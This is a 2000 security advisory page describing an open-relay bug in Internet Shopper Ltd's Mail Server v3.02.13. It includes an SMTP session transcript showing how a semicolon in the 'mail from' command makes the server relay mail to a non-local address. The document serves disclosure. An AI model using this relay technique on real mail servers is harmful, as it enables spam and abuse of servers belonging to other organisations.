Advisories : Internet Shopper Ltd's Mail Server Open relay bug

main menu

- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news

discussions

- read forum
- new topic
- search

meetings

- meetings list
- recent additions
- add your info

top 100 sites

- visit top sites
- sign up now
- members

webmasters

- add your url
- add domain
- search box
- link to us

projects

- our projects
- free email

m4d network

- security software
- secureroot
- m4d.com

Home : Advisories : Internet Shopper Ltd's Mail Server Open relay bug

Title:	Internet Shopper Ltd's Mail Server Open relay bug
Released by:	Imran Ghory
Date:	18th September 2000
Printable version:	Click here

Internet Shopper Ltd's Mail Server Open relay bug.



(I have been unable to make contact with Internet Shopper Ltd, and

as this bug might easily be found accidently I have decide to make

it public)



SUMMARY:



Internet Shopper Ltd's Mail Server can be made to accept and

handle mail for non-local sites.



DETAILS:



Version involved:



Internet Shopper Ltd's Mail Server v3.02.13



No other versions have been tested.



Exploit:



The use of the semi-colon in the "mail from" command will allow

mail to be sent to machine that aren't local.



Exploit in action:



220 mailsvr.xxxxxxxxxx.ac.uk WindowsNT SMTP Server

v3.02.13/32.aap3 ready at Wed, 13 Sep 2000 21:03:39 +0100

helo me

250 mailsvr.xxxxxxxxxx.ac.uk me

mail from;

250 Ok.

rcpt to: ImranG@btinternet.com

250 Ok.

data

354 Start mail input, end with ..



Test data

.

250 Requested mail action Ok.

quit

221 Goodbye me



Fix:



None known at this time.



Imran Ghory